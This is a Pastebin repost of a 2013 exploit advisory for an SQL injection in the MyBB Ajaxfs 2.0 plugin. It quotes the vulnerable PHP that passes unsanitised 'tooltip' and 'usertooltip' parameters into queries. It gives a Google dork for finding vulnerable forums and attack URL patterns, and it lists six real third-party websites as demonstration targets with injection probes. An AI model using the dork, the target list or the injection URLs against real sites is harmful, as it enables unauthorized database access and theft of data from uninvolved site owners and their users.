SHARE
TWEET

Sql Injection vulnerability In Mybb Ajaxfs Plugin Version 2.

Googleinurl Nov 27th, 2013 701 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Sql Injection vulnerability In Mybb Ajaxfs Plugin Version 2.0
  2.  
  3. #################################
  4. #
  5. # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
  6. # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
  7. # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
  8. # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
  9. # @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
  10. # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
  11. # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
  12. # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
  13. # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
  14. #
  15. #####################################
  16.  
  17. # Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability
  18.  
  19. # Author : Iranian Exploit DataBase
  20.  
  21. # Discovered By : IeDb
  22.  
  23. # Email : IeDb.Team (at) Gmail (dot) com [email concealed] - o0_iedb_0o (at) yahoo (dot) com [email concealed]
  24.  
  25. # Home : http://iedb.ir - http://iedb.ir/acc
  26.  
  27. # Fb Page : https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/19926686
  28. 0256538
  29.  
  30. # Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2
  31.  
  32. # Security Risk : High
  33.  
  34. # Tested on : Linux
  35.  
  36. # Dork : inurl:ajaxfs.php
  37.  
  38. #################################
  39.  
  40. 1)
  41.  
  42. if(isset($_GET['tooltip']))
  43. {
  44. $pid=$_GET['tooltip'];
  45. $query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");
  46.  
  47.  
  48. 2)
  49.  
  50. if(isset($_GET['usertooltip']))
  51. {
  52. $uid=$_GET['usertooltip'];
  53. $query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");
  54.  
  55. http://localhost/Upload/ajaxfs.php?usertooltip=1'
  56.  
  57. 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
  58.  
  59. Google DORK : inurl:ajaxfs.php
  60.  
  61.  
  62. # Exploit :
  63.  
  64. # http://site.com/mybb/ajaxfs.php?tooltip=[sql]
  65.  
  66. # http://site.com/mybb/ajaxfs.php?usertooltip=[sql]
  67.  
  68. # Dem0 :
  69.  
  70. # http://www.forum.birahy.com/ajaxfs.php?tooltip=mostreffer'
  71.  
  72. # http://www.tamishe.ir/ajaxfs.php?tooltip=mostreffer'
  73.  
  74. # http://www.opencartvn.com/forum/ajaxfs.php?tooltip=mostreffer'
  75.  
  76. # http://freenimbuzz.takbb.com/_mybb_/ajaxfs.php?tooltip='
  77.  
  78. # http://dvlottery.us/ajaxfs.php?tooltip=13349'
  79.  
  80. # http://www.taltallon.com/forum/ajaxfs.php?tooltip=mostreffer'
  81.  
  82. #################################
  83.  
  84. # Tnx To : All Member In Iedb.ir/acc & Iranian Hackers
  85.  
  86. #################################
  87.  
  88. # Exploit Archive = http://www.iedb.ir/exploits-889.html
  89.  
  90. #################################
RAW Paste Data
Top